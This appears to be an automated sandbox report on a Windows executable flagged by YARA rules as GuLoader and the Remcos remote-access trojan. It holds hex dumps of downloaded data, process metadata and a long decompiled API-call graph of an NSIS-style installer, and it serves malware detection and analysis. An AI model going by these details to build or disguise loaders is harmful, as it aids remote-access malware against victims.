                                                2025-01-10 19:38:49 UTC16384INData Raw: b3 9c 8a b7 58 bc f8 f3 9d 7e 1e 92 67 c2 99 b1 6d 8e 3f 34 0d b0 d8 d8 c9 4d c6 7e 90 4c 9a 93 ca 77 5b 60 88 95 84 6f 29 de 57 81 3a e4 f0 17 e4 5e df b3 6b 29 9e fc 45 36 51 b4 db 7d bf c1 03 41 c5 c9 43 d7 5e 7e e7 7f 64 9e 33 82 7f 1d c2 72 e2 4c 43 09 7f 1f 40 e1 9f a9 c0 86 97 c8 40 cc 74 15 48 e0 49 31 16 5d a5 e4 78 c5 66 7b 7f d4 6d e3 d7 b3 4d 4b a0 1f 1e ac 60 ba ca ef f4 53 bd 8f b1 a3 7f b1 d6 b7 fc e0 89 24 66 8a 0c 85 bf c1 d9 be c2 d7 8a 6e 53 0b bc f7 e7 58 0c 40 3e 41 99 74 0d 59 3d 49 52 b1 39 9c e5 21 4e fb ce f1 dd 9c e2 55 13 b9 65 7b ef 99 bf f1 98 e1 57 5d 9c 25 ba 44 5e c3 1c e3 c2 a7 2d 3b bd 44 6e e8 b4 c5 c9 7c c6 46 57 a6 c4 e5 bc 3f 26 97 a3 fe a4 c6 55 66 d9 c6 fa a1 8a e2 06 b3 1e f3 68 29 ae 52 fc 55 44 25 b0 fb 3d 48 a1
                                                Data Ascii: X~gm?4M~Lw[`o)W:^k)E6Q}AC^~d3rLC@@tHI1]xf{mMK`S$fnSX@>AtY=IR9!NUe{W]%D^-;Dn|FW?&Ufh)RUD%=H
                                                2025-01-10 19:38:49 UTC16384INData Raw: 2a 65 1b 6d 7f 7f 4d bd ec e0 92 fa bc 4d a5 b0 24 21 d3 62 f8 75 86 7f 5a 1a e3 d6 3b e9 ad 25 98 ea 95 9f 05 22 06 91 80 c9 84 54 28 ff 8e 89 12 1e 11 13 05 d0 b8 a7 c3 2d f1 49 7b bc 44 a3 4f 5c 2a 02 de 3a f2 bf 63 81 2f cc 4d 6b 42 b4 22 53 ca ec e6 a5 26 cd 7f e0 9a f8 86 fb c9 a7 13 9f 0f 83 5b 44 f6 2f 44 86 d4 26 e9 93 e1 69 98 ae 7a be b5 b4 07 88 c9 f4 84 7f 86 a6 89 34 36 b1 9a 64 d5 d2 7a 7d 4c d8 27 9f d4 dd be 51 7e 2b 95 62 09 55 8a 78 a3 9a 14 2e 64 22 5b e1 f1 b0 e7 b9 28 1a 2c d9 cc f9 67 fa 55 c1 13 c6 ac d6 d2 5d a9 cd 19 c2 43 7c 05 66 d6 f5 64 1a 81 f9 b7 bf 00 e6 05 ea 16 e8 f6 be 9b fa 5f 36 b6 f6 96 a9 13 21 94 fc b8 9f 85 92 78 cd 50 90 66 21 9c 7e 03 5f 68 a5 98 85 53 94 7f be 96 ba 4c 9d 7c 7c c9 ff 2a 7f 95 9f a9 42 c8 74 f3
                                                Data Ascii: *emMM$!buZ;%"T(-I{DO\*:c/MkB"S&[D/D&iz46dz}L'Q~+bUx.d"[(,gU]C|fd_6!xPf!~_hSL||*Bt
                                                2025-01-10 19:38:49 UTC16384INData Raw: e3 cd 9d 8e b5 a5 20 00 e3 77 48 5c 75 90 9d 0b 47 58 0c 6c 2c 52 76 f2 4b 72 9a 7b 24 3f dc 7d 2b 8f f6 8f cd 9f 44 7f 41 12 f5 db e3 dd d9 ea 6b 4f 74 8c 9c df 7a 82 3e 30 27 b3 a5 ef fd 46 3f 06 db c1 09 fd 16 4d c0 5c 14 e5 33 f0 1b 5e f0 82 44 d2 83 b4 e2 88 23 04 10 d1 11 73 e7 2c 27 ca 80 fc ce 45 f1 d4 1b d2 54 f0 48 e7 6a a4 ac cd 4f c7 eb b1 b3 7c 48 ac f6 9e e6 39 74 e3 6e e9 a3 93 57 a5 95 ec f2 d3 94 6c b7 93 ba 10 10 5a df 03 96 46 ea ec 10 ab e5 dd ed 16 36 22 95 67 75 76 37 5c 8f c8 76 e0 bc 15 56 b4 0a bc f4 d9 70 cd ca ac 31 7a 07 f2 5e 34 c4 fd da 24 c8 83 76 d0 55 52 09 fb ca d9 fe 38 02 78 09 03 e3 a4 d8 66 d3 66 aa 41 54 77 30 55 57 f5 0e e8 4f 84 e6 40 01 fd b2 e9 db 84 9b 7e 96 3c f0 25 aa 14 fc f2 cf 97 69 3b b5 fa 48 31 b6 4c 65
                                                Data Ascii: wH\uGXl,RvKr{$?}+DAkOtz>0'F?M\3^D#s,'ETHjO|H9tnWlZF6"guv7\vVp1z^4$vUR8xffATw0UWO@~<%i;H1Le


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:14:38:23
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\IpykYx5iwz.exe"
                                                Imagebase:0x400000
                                                File size:1'727'984 bytes
                                                MD5 hash:15214C528C41DE4D5E542EBD3D4AC075
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:14:38:33
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\IpykYx5iwz.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\IpykYx5iwz.exe"
                                                Imagebase:0x400000
                                                File size:1'727'984 bytes
                                                MD5 hash:15214C528C41DE4D5E542EBD3D4AC075
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:23.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:17.4%
                                                  Total number of Nodes:1328
                                                  Total number of Limit Nodes:43
                                                  execution_graph 4118 406ec0 4121 406651 4118->4121 4119 4066d2 GlobalFree 4120 4066db GlobalAlloc 4119->4120 4120->4121 4122 406fbc 4120->4122 4121->4119 4121->4120 4121->4121 4121->4122 4123 406752 GlobalAlloc 4121->4123 4124 406749 GlobalFree 4121->4124 4123->4121 4123->4122 4124->4123 4125 401d41 4126 401d54 GetDlgItem 4125->4126 4127 401d47 4125->4127 4130 401d4e 4126->4130 4128 402b0a 17 API calls 4127->4128 4128->4130 4129 401d8f GetClientRect LoadImageA SendMessageA 4133 4029b8 4129->4133 4134 401deb 4129->4134 4130->4129 4131 402b2c 17 API calls 4130->4131 4131->4129 4134->4133 4135 401df3 DeleteObject 4134->4135 4135->4133 3737 401746 3738 402b2c 17 API calls 3737->3738 3739 40174d 3738->3739 3740 405d09 2 API calls 3739->3740 3741 401754 3740->3741 3742 405d09 2 API calls 3741->3742 3742->3741 4136 73402646 4137 73402654 VirtualAlloc 4136->4137 4138 734026aa 4136->4138 4137->4138 4139 401947 4140 402b2c 17 API calls 4139->4140 4141 40194e lstrlenA 4140->4141 4142 4025e4 4141->4142 4143 401fc8 4144 402b2c 17 API calls 4143->4144 4145 401fcf 4144->4145 4146 4064d9 5 API calls 4145->4146 4147 401fde 4146->4147 4148 401ff6 GlobalAlloc 4147->4148 4149 40205e 4147->4149 4148->4149 4150 40200a 4148->4150 4151 4064d9 5 API calls 4150->4151 4152 402011 4151->4152 4153 4064d9 5 API calls 4152->4153 4154 40201b 4153->4154 4154->4149 4158 40609f wsprintfA 4154->4158 4156 402052 4159 40609f wsprintfA 4156->4159 4158->4156 4159->4149 4160 4025c8 4161 402b2c 17 API calls 4160->4161 4162 4025cf 4161->4162 4165 405cda GetFileAttributesA CreateFileA 4162->4165 4164 4025db 4165->4164 4169 40254c 4170 402b6c 17 API calls 4169->4170 4171 402556 4170->4171 4172 402b0a 17 API calls 4171->4172 4173 40255f 4172->4173 4174 402783 4173->4174 4175 402586 RegEnumValueA 4173->4175 4176 40257a RegEnumKeyA 4173->4176 4177 40259b RegCloseKey 4175->4177 4176->4177 4177->4174 4179 4067cd 4183 406651 4179->4183 4180 406fbc 4181 4066d2 GlobalFree 4182 4066db GlobalAlloc 4181->4182 4182->4180 4182->4183 4183->4180 4183->4181 4183->4182 4184 406752 GlobalAlloc 4183->4184 4185 406749 GlobalFree 4183->4185 4184->4180 4184->4183 4185->4184 4186 40654e WaitForSingleObject 4187 406568 4186->4187 4188 40657a GetExitCodeProcess 4187->4188 4189 406515 2 API calls 4187->4189 4190 40656f WaitForSingleObject 4189->4190 4190->4187 4191 404bd4 GetDlgItem GetDlgItem 4192 404c2a 7 API calls 4191->4192 4196 404e51 4191->4196 4193 404cd2 DeleteObject 4192->4193 4194 404cc6 SendMessageA 4192->4194 4195 404cdd 4193->4195 4194->4193 4197 404d14 4195->4197 4198 406163 17 API calls 4195->4198 4212 404f33 4196->4212 4226 404ec0 4196->4226 4244 404b22 SendMessageA 4196->4244 4199 4041cf 18 API calls 4197->4199 4203 404cf6 SendMessageA SendMessageA 4198->4203 4204 404d28 4199->4204 4200 404fdf 4201 404ff1 4200->4201 4202 404fe9 SendMessageA 4200->4202 4213 405003 ImageList_Destroy 4201->4213 4214 40500a 4201->4214 4220 40501a 4201->4220 4202->4201 4203->4195 4209 4041cf 18 API calls 4204->4209 4205 404e44 4206 404236 8 API calls 4205->4206 4211 4051d5 4206->4211 4207 404f25 SendMessageA 4207->4212 4223 404d39 4209->4223 4210 404f8c SendMessageA 4210->4205 4216 404fa1 SendMessageA 4210->4216 4212->4200 4212->4205 4212->4210 4213->4214 4218 405013 GlobalFree 4214->4218 4214->4220 4215 405189 4215->4205 4221 40519b ShowWindow GetDlgItem ShowWindow 4215->4221 4217 404fb4 4216->4217 4228 404fc5 SendMessageA 4217->4228 4218->4220 4219 404e13 GetWindowLongA SetWindowLongA 4222 404e2c 4219->4222 4220->4215 4238 405055 4220->4238 4249 404ba2 4220->4249 4221->4205 4224 404e31 ShowWindow 4222->4224 4225 404e49 4222->4225 4223->4219 4227 404d8b SendMessageA 4223->4227 4229 404e0e 4223->4229 4232 404dc9 SendMessageA 4223->4232 4233 404ddd SendMessageA 4223->4233 4242 404204 SendMessageA 4224->4242 4243 404204 SendMessageA 4225->4243 4226->4207 4226->4212 4227->4223 4228->4200 4229->4219 4229->4222 4232->4223 4233->4223 4235 40515f InvalidateRect 4235->4215 4236 405175 4235->4236 4258 404add 4236->4258 4237 405083 SendMessageA 4241 405099 4237->4241 4238->4237 4238->4241 4240 40510d SendMessageA SendMessageA 4240->4241 4241->4235 4241->4240 4242->4205 4243->4196 4245 404b81 SendMessageA 4244->4245 4246 404b45 GetMessagePos ScreenToClient SendMessageA 4244->4246 4247 404b79 4245->4247 4246->4247 4248 404b7e 4246->4248 4247->4226 4248->4245 4261 406141 lstrcpynA 4249->4261 4251 404bb5 4262 40609f wsprintfA 4251->4262 4253 404bbf 4254 40140b 2 API calls 4253->4254 4255 404bc8 4254->4255 4263 406141 lstrcpynA 4255->4263 4257 404bcf 4257->4238 4264 404a18 4258->4264 4260 404af2 4260->4215 4261->4251 4262->4253 4263->4257 4265 404a2e 4264->4265 4266 406163 17 API calls 4265->4266 4267 404a92 4266->4267 4268 406163 17 API calls 4267->4268 4269 404a9d 4268->4269 4270 406163 17 API calls 4269->4270 4271 404ab3 lstrlenA wsprintfA SetDlgItemTextA 4270->4271 4271->4260 4272 4014d6 4273 402b0a 17 API calls 4272->4273 4274 4014dc Sleep 4273->4274 4276 4029b8 4274->4276 4284 73401058 4286 73401074 4284->4286 4285 734010dc 4286->4285 4287 734010b1 4286->4287 4288 734010a8 GlobalSize 4286->4288 4289 734010b5 GlobalAlloc 4287->4289 4290 734010c6 4287->4290 4288->4287 4289->4290 4291 734010d1 GlobalFree 4290->4291 4291->4285 3953 401759 3954 402b2c 17 API calls 3953->3954 3955 401760 3954->3955 3956 401786 3955->3956 3957 40177e 3955->3957 3994 406141 lstrcpynA 3956->3994 3993 406141 lstrcpynA 3957->3993 3960 401784 3964 4063ab 5 API calls 3960->3964 3961 401791 3962 405ad9 3 API calls 3961->3962 3963 401797 lstrcatA 3962->3963 3963->3960 3979 4017a3 3964->3979 3965 4017e4 3967 405cb5 2 API calls 3965->3967 3966 406444 2 API calls 3966->3979 3967->3979 3969 4017ba CompareFileTime 3969->3979 3970 40187e 3971 405268 24 API calls 3970->3971 3974 401888 3971->3974 3972 405268 24 API calls 3975 40186a 3972->3975 3973 406141 lstrcpynA 3973->3979 3976 4030b5 44 API calls 3974->3976 3977 40189b 3976->3977 3978 4018af SetFileTime 3977->3978 3980 4018c1 CloseHandle 3977->3980 3978->3980 3979->3965 3979->3966 3979->3969 3979->3970 3979->3973 3981 406163 17 API calls 3979->3981 3987 40585d MessageBoxIndirectA 3979->3987 3990 401855 3979->3990 3992 405cda GetFileAttributesA CreateFileA 3979->3992 3980->3975 3982 4018d2 3980->3982 3981->3979 3983 4018d7 3982->3983 3984 4018ea 3982->3984 3985 406163 17 API calls 3983->3985 3986 406163 17 API calls 3984->3986 3988 4018df lstrcatA 3985->3988 3989 4018f2 3986->3989 3987->3979 3988->3989 3991 40585d MessageBoxIndirectA 3989->3991 3990->3972 3990->3975 3991->3975 3992->3979 3993->3960 3994->3961 4292 401659 4293 402b2c 17 API calls 4292->4293 4294 40165f 4293->4294 4295 406444 2 API calls 4294->4295 4296 401665 4295->4296 4297 401959 4298 402b0a 17 API calls 4297->4298 4299 401960 4298->4299 4300 402b0a 17 API calls 4299->4300 4301 40196d 4300->4301 4302 402b2c 17 API calls 4301->4302 4303 401984 lstrlenA 4302->4303 4304 401994 4303->4304 4308 4019d4 4304->4308 4309 406141 lstrcpynA 4304->4309 4306 4019c4 4307 4019c9 lstrlenA 4306->4307 4306->4308 4307->4308 4309->4306 4310 401cda 4311 402b0a 17 API calls 4310->4311 4312 401ce0 IsWindow 4311->4312 4313 401a0e 4312->4313 4314 4024da 4315 402b6c 17 API calls 4314->4315 4316 4024e4 4315->4316 4317 402b2c 17 API calls 4316->4317 4318 4024ed 4317->4318 4319 4024f7 RegQueryValueExA 4318->4319 4324 402783 4318->4324 4320 40251d RegCloseKey 4319->4320 4321 402517 4319->4321 4320->4324 4321->4320 4325 40609f wsprintfA 4321->4325 4325->4320 4326 4051dc 4327 405200 4326->4327 4328 4051ec 4326->4328 4329 405208 IsWindowVisible 4327->4329 4332 40521f 4327->4332 4330 4051f2 4328->4330 4338 405249 4328->4338 4331 405215 4329->4331 4329->4338 4334 40421b SendMessageA 4330->4334 4335 404b22 5 API calls 4331->4335 4333 40524e CallWindowProcA 4332->4333 4337 404ba2 4 API calls 4332->4337 4336 4051fc 4333->4336 4334->4336 4335->4332 4337->4338 4338->4333 4339 402cdd 4340 402cec SetTimer 4339->4340 4342 402d05 4339->4342 4340->4342 4341 402d53 4342->4341 4343 402d59 MulDiv 4342->4343 4344 402d13 wsprintfA SetWindowTextA SetDlgItemTextA 4343->4344 4344->4341 4346 401a5e 4347 402b0a 17 API calls 4346->4347 4348 401a67 4347->4348 4349 402b0a 17 API calls 4348->4349 4350 401a0e 4349->4350 4351 404661 4352 40468d 4351->4352 4353 40469e 4351->4353 4412 405841 GetDlgItemTextA 4352->4412 4354 4046aa GetDlgItem 4353->4354 4361 404709 4353->4361 4356 4046be 4354->4356 4360 4046d2 SetWindowTextA 4356->4360 4364 405b72 4 API calls 4356->4364 4357 4047ed 4410 404997 4357->4410 4414 405841 GetDlgItemTextA 4357->4414 4358 404698 4359 4063ab 5 API calls 4358->4359 4359->4353 4365 4041cf 18 API calls 4360->4365 4361->4357 4366 406163 17 API calls 4361->4366 4361->4410 4363 404236 8 API calls 4368 4049ab 4363->4368 4369 4046c8 4364->4369 4370 4046ee 4365->4370 4371 40477d SHBrowseForFolderA 4366->4371 4367 40481d 4372 405bc7 18 API calls 4367->4372 4369->4360 4376 405ad9 3 API calls 4369->4376 4373 4041cf 18 API calls 4370->4373 4371->4357 4374 404795 CoTaskMemFree 4371->4374 4375 404823 4372->4375 4377 4046fc 4373->4377 4378 405ad9 3 API calls 4374->4378 4415 406141 lstrcpynA 4375->4415 4376->4360 4413 404204 SendMessageA 4377->4413 4380 4047a2 4378->4380 4384 4047d9 SetDlgItemTextA 4380->4384 4387 406163 17 API calls 4380->4387 4382 40483a 4386 4064d9 5 API calls 4382->4386 4383 404702 4385 4064d9 5 API calls 4383->4385 4384->4357 4385->4361 4395 404841 4386->4395 4388 4047c1 lstrcmpiA 4387->4388 4388->4384 4390 4047d2 lstrcatA 4388->4390 4389 40487d 4416 406141 lstrcpynA 4389->4416 4390->4384 4392 404884 4393 405b72 4 API calls 4392->4393 4394 40488a GetDiskFreeSpaceA 4393->4394 4397 4048ae MulDiv 4394->4397 4399 4048d5 4394->4399 4395->4389 4398 405b20 2 API calls 4395->4398 4395->4399 4397->4399 4398->4395 4400 404946 4399->4400 4402 404add 20 API calls 4399->4402 4401 404969 4400->4401 4404 40140b 2 API calls 4400->4404 4417 4041f1 KiUserCallbackDispatcher 4401->4417 4403 404933 4402->4403 4405 404948 SetDlgItemTextA 4403->4405 4406 404938 4403->4406 4404->4401 4405->4400 4408 404a18 20 API calls 4406->4408 4408->4400 4409 404985 4409->4410 4418 4045ba 4409->4418 4410->4363 4412->4358 4413->4383 4414->4367 4415->4382 4416->4392 4417->4409 4419 4045c8 4418->4419 4420 4045cd SendMessageA 4418->4420 4419->4420 4420->4410 3208 402363 3209 402371 3208->3209 3210 40236b 3208->3210 3212 402381 3209->3212 3213 402b2c 17 API calls 3209->3213 3211 402b2c 17 API calls 3210->3211 3211->3209 3214 40238f 3212->3214 3216 402b2c 17 API calls 3212->3216 3213->3212 3218 402b2c 3214->3218 3216->3214 3219 402b38 3218->3219 3224 406163 3219->3224 3222 402398 WritePrivateProfileStringA 3236 406170 3224->3236 3225 406392 3226 402b59 3225->3226 3257 406141 lstrcpynA 3225->3257 3226->3222 3241 4063ab 3226->3241 3228 40636c lstrlenA 3228->3236 3231 406163 10 API calls 3231->3228 3233 406288 GetSystemDirectoryA 3233->3236 3234 40629b GetWindowsDirectoryA 3234->3236 3235 4063ab 5 API calls 3235->3236 3236->3225 3236->3228 3236->3231 3236->3233 3236->3234 3236->3235 3237 4062cf SHGetSpecialFolderLocation 3236->3237 3238 406163 10 API calls 3236->3238 3239 406315 lstrcatA 3236->3239 3250 406028 3236->3250 3255 40609f wsprintfA 3236->3255 3256 406141 lstrcpynA 3236->3256 3237->3236 3240 4062e7 SHGetPathFromIDListA CoTaskMemFree 3237->3240 3238->3236 3239->3236 3240->3236 3242 4063b7 3241->3242 3244 406414 CharNextA 3242->3244 3247 40641f 3242->3247 3248 406402 CharNextA 3242->3248 3249 40640f CharNextA 3242->3249 3262 405b04 3242->3262 3243 406423 CharPrevA 3243->3247 3244->3242 3244->3247 3245 40643e 3245->3222 3247->3243 3247->3245 3248->3242 3249->3244 3258 405fc7 3250->3258 3253 40608b 3253->3236 3254 40605c RegQueryValueExA RegCloseKey 3254->3253 3255->3236 3256->3236 3257->3226 3259 405fd6 3258->3259 3260 405fda 3259->3260 3261 405fdf RegOpenKeyExA 3259->3261 3260->3253 3260->3254 3261->3260 3263 405b0a 3262->3263 3264 405b1d 3263->3264 3265 405b10 CharNextA 3263->3265 3264->3242 3265->3263 4421 401563 4422 402960 4421->4422 4425 40609f wsprintfA 4422->4425 4424 402965 4425->4424 4426 401b63 4427 401b70 4426->4427 4428 401bb4 4426->4428 4431 40233b 4427->4431 4436 401b87 4427->4436 4429 401bb8 4428->4429 4430 401bdd GlobalAlloc 4428->4430 4439 401bf8 4429->4439 4447 406141 lstrcpynA 4429->4447 4432 406163 17 API calls 4430->4432 4433 406163 17 API calls 4431->4433 4432->4439 4435 402348 4433->4435 4440 40585d MessageBoxIndirectA 4435->4440 4445 406141 lstrcpynA 4436->4445 4437 401bca GlobalFree 4437->4439 4440->4439 4441 401b96 4446 406141 lstrcpynA 4441->4446 4443 401ba5 4448 406141 lstrcpynA 4443->4448 4445->4441 4446->4443 4447->4437 4448->4439 4449 402765 4450 402b2c 17 API calls 4449->4450 4451 40276c FindFirstFileA 4450->4451 4452 40278f 4451->4452 4456 40277f 4451->4456 4457 40609f wsprintfA 4452->4457 4454 402796 4458 406141 lstrcpynA 4454->4458 4457->4454 4458->4456 3820 4023e8 3821 40241a 3820->3821 3822 4023ef 3820->3822 3823 402b2c 17 API calls 3821->3823 3836 402b6c 3822->3836 3825 402421 3823->3825 3832 402bea 3825->3832 3827 402400 3829 402b2c 17 API calls 3827->3829 3831 402407 RegDeleteValueA RegCloseKey 3829->3831 3830 40242e 3831->3830 3833 402bf6 3832->3833 3834 402bfd 3832->3834 3833->3830 3834->3833 3841 402c2e 3834->3841 3837 402b2c 17 API calls 3836->3837 3838 402b83 3837->3838 3839 405fc7 RegOpenKeyExA 3838->3839 3840 4023f6 3839->3840 3840->3827 3840->3830 3842 405fc7 RegOpenKeyExA 3841->3842 3843 402c5c 3842->3843 3844 402cd6 3843->3844 3849 402c60 3843->3849 3844->3833 3845 402c82 RegEnumKeyA 3846 402c99 RegCloseKey 3845->3846 3845->3849 3847 4064d9 5 API calls 3846->3847 3850 402ca9 3847->3850 3848 402cba RegCloseKey 3848->3844 3849->3845 3849->3846 3849->3848 3851 402c2e 6 API calls 3849->3851 3852 402cca RegDeleteKeyA 3850->3852 3853 402cad 3850->3853 3851->3849 3852->3844 3853->3844 3854 40206a 3855 40212a 3854->3855 3856 40207c 3854->3856 3858 401423 24 API calls 3855->3858 3857 402b2c 17 API calls 3856->3857 3859 402083 3857->3859 3864 4022a9 3858->3864 3860 402b2c 17 API calls 3859->3860 3861 40208c 3860->3861 3862 4020a1 LoadLibraryExA 3861->3862 3863 402094 GetModuleHandleA 3861->3863 3862->3855 3865 4020b1 GetProcAddress 3862->3865 3863->3862 3863->3865 3866 4020c0 3865->3866 3867 4020fd 3865->3867 3868 4020c8 3866->3868 3869 4020df 3866->3869 3870 405268 24 API calls 3867->3870 3885 401423 3868->3885 3875 734016db 3869->3875 3872 4020d0 3870->3872 3872->3864 3873 40211e FreeLibrary 3872->3873 3873->3864 3877 7340170b 3875->3877 3876 73401834 3876->3872 3877->3876 3879 7340174f 3877->3879 3888 73402a38 3877->3888 3882 73401782 GlobalFree 3879->3882 3883 7340178e 3879->3883 3880 7340180f 3880->3876 3881 7340182d GlobalFree 3880->3881 3881->3876 3882->3883 3883->3880 3884 73401808 FreeLibrary 3883->3884 3884->3880 3886 405268 24 API calls 3885->3886 3887 401431 3886->3887 3887->3872 3890 73402a4a 3888->3890 3889 73402aef EnumWindows 3891 73402b0d 3889->3891 3890->3889 3891->3879 3892 40166a 3893 402b2c 17 API calls 3892->3893 3894 401671 3893->3894 3895 402b2c 17 API calls 3894->3895 3896 40167a 3895->3896 3897 402b2c 17 API calls 3896->3897 3898 401683 MoveFileA 3897->3898 3899 401696 3898->3899 3900 40168f 3898->3900 3901 406444 2 API calls 3899->3901 3904 4022a9 3899->3904 3902 401423 24 API calls 3900->3902 3903 4016a5 3901->3903 3902->3904 3903->3904 3905 405f20 36 API calls 3903->3905 3905->3900 4459 4025ea 4460 402603 4459->4460 4461 4025ef 4459->4461 4463 402b2c 17 API calls 4460->4463 4462 402b0a 17 API calls 4461->4462 4465 4025f8 4462->4465 4464 40260a lstrlenA 4463->4464 4464->4465 4466 405d81 WriteFile 4465->4466 4467 40262c 4465->4467 4466->4467 4475 4019ed 4476 402b2c 17 API calls 4475->4476 4477 4019f4 4476->4477 4478 402b2c 17 API calls 4477->4478 4479 4019fd 4478->4479 4480 401a04 lstrcmpiA 4479->4480 4481 401a16 lstrcmpA 4479->4481 4482 401a0a 4480->4482 4481->4482 3906 40156f 3907 401586 3906->3907 3908 40157f ShowWindow 3906->3908 3909 401594 ShowWindow 3907->3909 3910 4029b8 3907->3910 3908->3907 3909->3910 4483 4014f4 SetForegroundWindow 4484 4029b8 4483->4484 3995 403cfb 3996 403d13 3995->3996 3997 403e4e 3995->3997 3996->3997 3998 403d1f 3996->3998 3999 403e9f 3997->3999 4000 403e5f GetDlgItem GetDlgItem 3997->4000 4002 403d2a SetWindowPos 3998->4002 4003 403d3d 3998->4003 4001 403ef9 3999->4001 4012 401389 2 API calls 3999->4012 4004 4041cf 18 API calls 4000->4004 4005 40421b SendMessageA 4001->4005 4013 403e49 4001->4013 4002->4003 4006 403d42 ShowWindow 4003->4006 4007 403d5a 4003->4007 4008 403e89 SetClassLongA 4004->4008 4032 403f0b 4005->4032 4006->4007 4009 403d62 DestroyWindow 4007->4009 4010 403d7c 4007->4010 4011 40140b 2 API calls 4008->4011 4065 404158 4009->4065 4014 403d81 SetWindowLongA 4010->4014 4015 403d92 4010->4015 4011->3999 4016 403ed1 4012->4016 4014->4013 4017 403e3b 4015->4017 4018 403d9e GetDlgItem 4015->4018 4016->4001 4019 403ed5 SendMessageA 4016->4019 4024 404236 8 API calls 4017->4024 4022 403db1 SendMessageA IsWindowEnabled 4018->4022 4023 403dce 4018->4023 4019->4013 4020 40140b 2 API calls 4020->4032 4021 40415a DestroyWindow EndDialog 4021->4065 4022->4013 4022->4023 4027 403ddb 4023->4027 4029 403e22 SendMessageA 4023->4029 4030 403dee 4023->4030 4039 403dd3 4023->4039 4024->4013 4025 404189 ShowWindow 4025->4013 4026 406163 17 API calls 4026->4032 4027->4029 4027->4039 4028 4041a8 SendMessageA 4031 403e09 4028->4031 4029->4017 4033 403df6 4030->4033 4034 403e0b 4030->4034 4031->4017 4032->4013 4032->4020 4032->4021 4032->4026 4035 4041cf 18 API calls 4032->4035 4040 4041cf 18 API calls 4032->4040 4056 40409a DestroyWindow 4032->4056 4037 40140b 2 API calls 4033->4037 4036 40140b 2 API calls 4034->4036 4035->4032 4038 403e12 4036->4038 4037->4039 4038->4017 4038->4039 4039->4028 4041 403f86 GetDlgItem 4040->4041 4042 403fa3 ShowWindow KiUserCallbackDispatcher 4041->4042 4043 403f9b 4041->4043 4066 4041f1 KiUserCallbackDispatcher 4042->4066 4043->4042 4045 403fcd EnableWindow 4050 403fe1 4045->4050 4046 403fe6 GetSystemMenu EnableMenuItem SendMessageA 4047 404016 SendMessageA 4046->4047 4046->4050 4047->4050 4049 403cdc 18 API calls 4049->4050 4050->4046 4050->4049 4067 404204 SendMessageA 4050->4067 4068 406141 lstrcpynA 4050->4068 4052 404045 lstrlenA 4053 406163 17 API calls 4052->4053 4054 404056 SetWindowTextA 4053->4054 4055 401389 2 API calls 4054->4055 4055->4032 4057 4040b4 CreateDialogParamA 4056->4057 4056->4065 4058 4040e7 4057->4058 4057->4065 4059 4041cf 18 API calls 4058->4059 4060 4040f2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4059->4060 4061 401389 2 API calls 4060->4061 4062 404138 4061->4062 4062->4013 4063 404140 ShowWindow 4062->4063 4064 40421b SendMessageA 4063->4064 4064->4065 4065->4013 4065->4025 4066->4045 4067->4050 4068->4052 4485 401cfb 4486 402b0a 17 API calls 4485->4486 4487 401d02 4486->4487 4488 402b0a 17 API calls 4487->4488 4489 401d0e GetDlgItem 4488->4489 4490 4025e4 4489->4490 4491 4018fd 4492 401934 4491->4492 4493 402b2c 17 API calls 4492->4493 4494 401939 4493->4494 4495 405909 67 API calls 4494->4495 4496 401942 4495->4496 4497 401dff GetDC 4498 402b0a 17 API calls 4497->4498 4499 401e11 GetDeviceCaps MulDiv ReleaseDC 4498->4499 4500 402b0a 17 API calls 4499->4500 4501 401e42 4500->4501 4502 406163 17 API calls 4501->4502 4503 401e7f CreateFontIndirectA 4502->4503 4504 4025e4 4503->4504 4505 401000 4506 401037 BeginPaint GetClientRect 4505->4506 4508 40100c DefWindowProcA 4505->4508 4509 4010f3 4506->4509 4510 401179 4508->4510 4511 401073 CreateBrushIndirect FillRect DeleteObject 4509->4511 4512 4010fc 4509->4512 4511->4509 4513 401102 CreateFontIndirectA 4512->4513 4514 401167 EndPaint 4512->4514 4513->4514 4515 401112 6 API calls 4513->4515 4514->4510 4515->4514 4516 401900 4517 402b2c 17 API calls 4516->4517 4518 401907 4517->4518 4519 40585d MessageBoxIndirectA 4518->4519 4520 401910 4519->4520 4521 401502 4522 40150a 4521->4522 4524 40151d 4521->4524 4523 402b0a 17 API calls 4522->4523 4523->4524 3266 403384 SetErrorMode GetVersion 3267 4033c5 3266->3267 3268 4033cb 3266->3268 3269 4064d9 5 API calls 3267->3269 3356 40646b GetSystemDirectoryA 3268->3356 3269->3268 3271 4033e1 lstrlenA 3271->3268 3272 4033f0 3271->3272 3359 4064d9 GetModuleHandleA 3272->3359 3275 4064d9 5 API calls 3276 4033fe 3275->3276 3277 4064d9 5 API calls 3276->3277 3278 40340a #17 OleInitialize SHGetFileInfoA 3277->3278 3365 406141 lstrcpynA 3278->3365 3281 403456 GetCommandLineA 3366 406141 lstrcpynA 3281->3366 3283 403468 3284 405b04 CharNextA 3283->3284 3285 403491 CharNextA 3284->3285 3290 4034a1 3285->3290 3286 40356b 3287 40357e GetTempPathA 3286->3287 3367 403353 3287->3367 3289 403596 3291 4035f0 DeleteFileA 3289->3291 3292 40359a GetWindowsDirectoryA lstrcatA 3289->3292 3290->3286 3293 405b04 CharNextA 3290->3293 3297 40356d 3290->3297 3377 402e14 